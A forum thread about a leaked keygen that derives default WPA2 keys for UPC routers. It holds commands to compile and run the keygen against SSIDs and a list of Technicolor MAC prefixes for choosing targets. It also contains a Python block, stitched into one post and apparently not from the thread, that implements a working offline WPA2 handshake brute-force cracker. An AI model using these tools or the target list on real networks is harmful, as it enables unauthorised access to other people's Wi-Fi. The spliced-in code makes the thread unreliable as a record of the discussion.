
UPC router WPA2 key recovery

Comments

  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    although your world wonders me - you people i do not understand :)


  • Closed Accounts Posts: 673 ✭✭✭GekkePrutser


    I removed my rant about ISPs using generated WPA passwords (and ones with low complexity!)

    But I'm not sure if this is ok to discuss here in detail.. I do think anyone using the factory default SSID and WPA key should change the WPA key ASAP...


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops



    But I'm not sure if this is ok to discuss here in detail....

    Why not?

    Already compiled it. Now waiting for a UPC router to test.


  • Closed Accounts Posts: 673 ✭✭✭GekkePrutser


    syklops wrote: »
    Why not?

    I was just discussing the makeup of the UPC passwords in particular.. Not sure if that is OK/legal. Though if you run this tool or check the source code you will see the format quite clearly.

    I was just pointing out that the format they use has a complexity of 23^8 which is not nearly enough to be considered safe from bruteforcing in my opinion (it's only 78 billion possible combinations). Even if this tool doesn't work - it didn't for me - it can be bruteforced in a few days with the right hardware anyway, and it has been possible to do this for years. I suppose there is no problem in pointing that out.

    For a good level of security you need to have a random WPA password of at the very least 12 characters, with mixed uppercase/lowercase, digits and preferably some special characters too. At the moment with that you're talking years of "brute force" cracking time on a single PC with a good GPU (but remember computer hardware is getting exponentially faster too so in the future this won't be the case).

    Common words, even long ones or combinations, as well as mobile numbers etc are an absolute no-no!

    The WPA key generation algorithm is actually quite well made against brute force attacks as it uses a 2048-times hashing operation which increases bruteforce time a lot. In short, instead of one operation to try a single password you have to try thousands, compared to other algorithms. But using such a small keyspace like in this case undermines this when computers are so fast these days.

    Anyway I'm not sure if specifying what format they use or if specifying what tools can be used is allowed here. I hinted at this so I removed it.

    By the way @gctest50, I work in IT so knowing what is safe and what's not is part of my job. The knowing 'why' is not absolutely necessary for this but I find it helps understanding a lot. I like to know what I'm talking about. And I find the subject very interesting.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    By the way @gctest50, I work in IT so knowing what is safe and what's not is part of my job. The knowing 'why' is not absolutely necessary for this but I find it helps understanding a lot. I like to know what I'm talking about. And I find the subject very interesting.

    In that case, you'll know gctest50's post was in relation to the eircom WEP algorithm that was reverse engineered in 2007.


  • Closed Accounts Posts: 673 ✭✭✭GekkePrutser


    In that case, you'll know gctest50's post was in relation to the eircom WEP algorithm that was reverse engineered in 2007.

    Ah no I didn't get this.. Yeah I knew about that but it was my understanding that it was fixed long ago.

    I thought he thinks it's mad that people like talking about crypto :) I get that a lot. :p


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    Ah no I didn't get this.. Yeah I knew about that but it was my understanding that it was fixed long ago.

    I thought he thinks it's mad that people like talking about crypto :) I get that a lot. :p

    It was a lyric from Jimi Hendrix' Third Stone from the Sun. That song was used in the Eircom cipher.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Ah no I didn't get this.. Yeah I knew about that but it was my understanding that it was fixed long ago.

    I thought he thinks it's mad that people like talking about crypto :) I get that a lot. :p

    See here: https://seeit.org/eircom/


  • Closed Accounts Posts: 22,648 ✭✭✭✭beauf


    Password should be something a complete PITA to use. Especially if using a Xbox controller.


  • Closed Accounts Posts: 673 ✭✭✭GekkePrutser



    Thanks!! That was very interesting. Reminds me of the Apple poem in OS X.

    I wasn't in Ireland at that time so I hadn't followed it in detail.


  • Registered Users Posts: 121 ✭✭Rgb.ie


    Has any one tried this?

    Have tested six UPC SSIDs ( Cisco / Horizon ) none of the keys are correct.


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    Rgb.ie wrote: »
    Has any one tried this?

    Have tested six UPC SSID's ( Cisco / Horizon ) none of the keys are correct.

    Did you try all 25 keys generated for each of the SSIDs?

    I've tried 1 SSID and 1 key with a friend as proxy and it didn't work.

    I'd love to test this in more detail. I could write a script which tests each key...


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    That reddit link, the guy who posted the source reckons it is only working with the Thomson models.

    I dumped the firmware of the Cisco EPC 2425 via JTAG and someone emailed me the 3925 firmware before. (Just hope I still have them, this was several years ago)

    I loaded them up in IDA before but I didn't get too far and didn't spent too much time.

    As eCos https://en.m.wikipedia.org/wiki/ECos is a single rom/executable, you won't see any system/library calls, as all that code is in same executable (almost like a statically compiled executable). Makes reverse engineering tough. To be honest, I should have made use of FLIRT signatures (http://blog.dutchcoders.io/enhancing-ida-disassembler-listings-with-flirt/)

    Then you have to deal with MIPS. For me, this was relatively new. I am more experienced with ARM and x86.


  • Registered Users Posts: 121 ✭✭Rgb.ie


    syklops wrote: »
    Did you try all 25 keys generated for each of the SSIDs?

    I've tried 1 SSID and 1 key with a friend as proxy and it didn't work.

    I'd love to test this in more detail. I could write a script which tests each key...

    Sorry, I should have clarified.

    I have ALL the correct keys ( 6 in total that I checked ) and tried the script - none of the passes were correct for any of the access points.

    APs were a mix of cisco / Thomson


  • Registered Users, Registered Users 2 Posts: 37,485 ✭✭✭✭Khannie


    I removed my rant about ISPs using generated WPA passwords (and ones with low complexity!)

    But I'm not sure if this is ok to discuss here in detail..

    You discuss away there. Discussion of security holes, weaknesses and exploits is fair game here (subject to legal yada yada).


  • Registered Users Posts: 157 ✭✭Shoutcast Ireland


    How would I compile it?


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    syklops wrote: »
    It was a lyric from Jimi Hendrix' Third Stone from the Sun. That song was used in the Eircom cipher.

    cos everyone knows if you double the speed of the song, invert the left channel and recombine to highlight the vocals you get this :




    original speed i think :

    http://www.dailymotion.com/video/x1j0un_third-stone-from-the-sun-by-jimi-he_music


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    How would I compile it?

    Compilation instructions are in the source code.

    BRB

    Edit:

    Make sure you have gcc / build-essential installed. Then run:

    gcc -fPIC -shared -I/usr/include/python2.7 upc_keys.c -o upc_keys.so -lcrypto && sudo cp upc_keys.so /usr/lib/python2.7/


  • Registered Users, Registered Users 2 Posts: 570 ✭✭✭hooplah


    How would I compile it?

    Do you have Linux? If so go to the terminal, and in the directory you have downloaded the file to enter the following command:

    [from the source code]
    gcc -O2 -o upc_keys upc_keys.c -lcrypto
    

    Now you can try SSIDs by entering
    ./upc_keys SSID
    

    If you don't have gcc installed you will have to do so. If you have a Mac you might be able to install gcc through Homebrew - http://brew.sh/

    If you only have a Windows machine you'll need something like Cygwin to compile: https://www.cygwin.com/


  • Registered Users Posts: 157 ✭✭Shoutcast Ireland


    Thanks for that, got it installed, tried two routers. No luck.


  • Registered Users, Registered Users 2 Posts: 570 ✭✭✭hooplah


    Has anyone got it to work?

    I tried it for my router here at home. None of the generated passwords match the one I use.
    I have tried 5 or 6 of them but no luck.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I looked at the EPC3925 and it has a 9 digit serial number. This keygen generates 8-digits serials for a given SSID. I generated the WPA2 keys for my 9-digit serial by tweaking the .c and as you can guess, incorrect key.

    The reddit link in the OP shows that it works on some of the Technicolor routers. In some cases the generated serials were wrong also, but would generate the correct WPA2 key directly from the correct serial.

    So looks like this isn't as interesting as it first seemed.


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    I looked at the EPC3925 and it has a 9 digit serial number. This keygen generates 8-digits serials for a given SSID. I generated the WPA2 keys for my 9-digit serial by tweaking the .c and as you can guess, incorrect key.

    The reddit link in the OP shows that it works on some of the Technicolor routers. In some cases the generated serials were wrong also, but would generate the correct WPA2 key directly from the correct serial.

    So looks like this isn't as interesting as it first seemed.

    Is it just Technicolors or is it some Technicolors and some Cisco/Thomsons?

    If it's just Technicolors you can identify whether the AP is a Technicolor or not by the first 6 digits of its BSSID:
    FC94E3 Technicolor USA Inc.
    FC528D Technicolor CH USA Inc.
    E0885D Technicolor CH USA Inc
    CC3540 Technicolor USA Inc.
    CC03FA Technicolor CH USA
    C4EA1D Technicolor
    C42795 Technicolor USA Inc.
    B0C287 Technicolor CH USA Inc
    A4B1E9 Technicolor
    9C9726 Technicolor
    8C04FF Technicolor USA Inc.
    88F7C7 Technicolor USA Inc.
    80C6AB Technicolor USA Inc.
    802994 Technicolor CH USA
    589835 Technicolor
    58238C Technicolor CH USA
    4432C8 Technicolor USA Inc.
    30918F Technicolor
    28BE9B Technicolor USA Inc.
    08952A Technicolor CH USA Inc


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Seems to be some and some!

    You can see here here some people have commented on success to some degree: http://reddit.com/r/netsec/comments/3z1672/upc_router_wpa2_pass_recovery_tool/


  • Registered Users, Registered Users 2 Posts: 1,667 ✭✭✭Impetus


    I have had my UPC router firmware updated automatically. Sometime after the update, I used my known, carefully set, router password and was denied entry.

    The firmware update had wiped the password and made the user ID = return and the password = return key too.

    It seems to me that they have little regard for customers' data security.

    While I use wired Ethernet rather than WiFi (except for a mobile phone), their routers do not seem to support faster protocols such as 802.11 ac. This would make it somewhat slower for a determined 'neighbour' to crack the password.


  • Closed Accounts Posts: 673 ✭✭✭GekkePrutser


    Impetus wrote: »
    While I use wired Ethernet rather than WiFi (except for a mobile phone), their routers do not seem to support faster protocols such as 802.11 ac. This would make it somewhat slower for a determined 'neighbour' to crack the password.

    This is not really the case anymore. The network speed doesn't matter when cracking WPA2-PSK. All you need is one captured handshake and then you can bruteforce it offline. What does matter is the complexity and length of the password (which for UPC's default passwords is not very good).

    A couple of years ago the "Reaver" WPS attack came out and with that attack the network speed did actually matter because it was an active online attack. However it could be easily mitigated by turning WPS off and these days routers automatically block WPS if a wrong password is tried several times within an X amount of time, making it pretty useless. I don't think it works on UPC's routers anymore.

    It also matters for attacking WEP but I don't think there are any 802.11ac routers that do WEP anyway :) WEP is so broken you might as well use no encryption.
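
    The two points made in this thread, the 23^8 keyspace estimate from earlier in the discussion and the "one captured handshake, then crack offline" attack described in the post above, as one added Python example that is not from the thread or from the upc_keys tool. The PBKDF2, PRF-512 and EAPOL MIC steps are the standard WPA2-PSK derivation; everything else (the 23-letter alphabet, the SSID, MAC addresses, nonces, EAPOL bytes, the "factory" key and the 400,000 guesses/s rate) is a constructed assumption so the block runs offline.

```python
import hashlib
import hmac
import itertools

# Keyspace of the default format discussed in the thread: 8 characters from a
# 23-letter alphabet. Which 23 letters the firmware uses is not stated on this
# page; the alphabet below is an assumption used only to build sample candidates.
ALPHABET = "ABCDEFGHJKMNPQRSTUVWXYZ"  # 23 letters, I/L/O dropped (assumption)
KEY_LEN = 8


def keyspace_size(alphabet_size: int = len(ALPHABET), length: int = KEY_LEN) -> int:
    """Number of candidate keys: alphabet_size ** length (23**8 ~ 78.3 billion)."""
    return alphabet_size ** length


def brute_force_days(keyspace: int, guesses_per_second: float) -> float:
    """Worst-case days to exhaust a keyspace at a given PBKDF2 throughput."""
    return keyspace / guesses_per_second / 86400


def pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the slow step an offline cracker pays once per candidate; it is why a
    large keyspace matters more than link speed once a handshake is captured."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-512: expand the PMK with both MACs and both nonces into a 64-byte PTK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of SHA-1 output covers the 64 bytes needed
        out += hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    """WPA2 (CCMP) Key MIC: first 16 bytes of HMAC-SHA1 over the EAPOL-Key frame
    with its 16-byte MIC field set to zero. kck is PTK[0:16]."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def crack(candidates, ssid, aa, spa, anonce, snonce, eapol_zeroed, target_mic):
    """Offline attack: one PBKDF2 + one PRF-512 + one HMAC per candidate, no radio needed."""
    for cand in candidates:
        kck = ptk(pmk(cand, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), target_mic):
            return cand
    return None


# --- constructed handshake (not a real capture; values are placeholders) ---
SSID = "UPC1234567"
AA = bytes.fromhex("647c3400aabb")      # AP BSSID, made up
SPA = bytes.fromhex("001a2b334455")     # client MAC, made up
ANONCE = bytes(range(32))               # nonces from messages 1 and 2, made up
SNONCE = bytes(range(32, 64))
# Message 2 EAPOL-Key body with the MIC field already zeroed, as a cracker prepares it
EAPOL_ZEROED = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(8) + SNONCE + bytes(57)
TRUE_KEY = "QWRTKMNP"                   # the "factory" key in this toy setup
CAPTURED_MIC = eapol_mic(ptk(pmk(TRUE_KEY, SSID), AA, SPA, ANONCE, SNONCE)[:16], EAPOL_ZEROED)


def demo_candidates():
    """A few lexically-first keys of the 23^8 space plus the true key; a real run walks all of them."""
    first = ["".join(c) for c in itertools.islice(itertools.product(ALPHABET, repeat=KEY_LEN), 50)]
    return first + [TRUE_KEY]


if __name__ == "__main__":
    n = keyspace_size()
    print(f"keyspace: 23^8 = {n:,}")
    print(f"at 400,000 PBKDF2/s (assumed GPU rate): {brute_force_days(n, 400_000):.1f} days worst case")
    print("recovered key:", crack(demo_candidates(), SSID, AA, SPA, ANONCE, SNONCE, EAPOL_ZEROED, CAPTURED_MIC))
```

    The PBKDF2 rate is the only parameter that changes the estimate; doubling the key length to 16 characters of the same alphabet would turn days into billions of years at the same rate, which is the point being made about the default format.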


  • Registered Users, Registered Users 2 Posts: 1,667 ✭✭✭Impetus


    What does matter is the complexity and length of the password (which for UPC's default passwords is not very good).
    Especially when a firmware update changes the default (or user-selected) password to zero characters (which also applies to user ID).

    I am thinking that it may be a 'feature' of the Cisco platform for updating firmware used by their ISP clients - because I have noticed it on Cisco modems in more than one country.

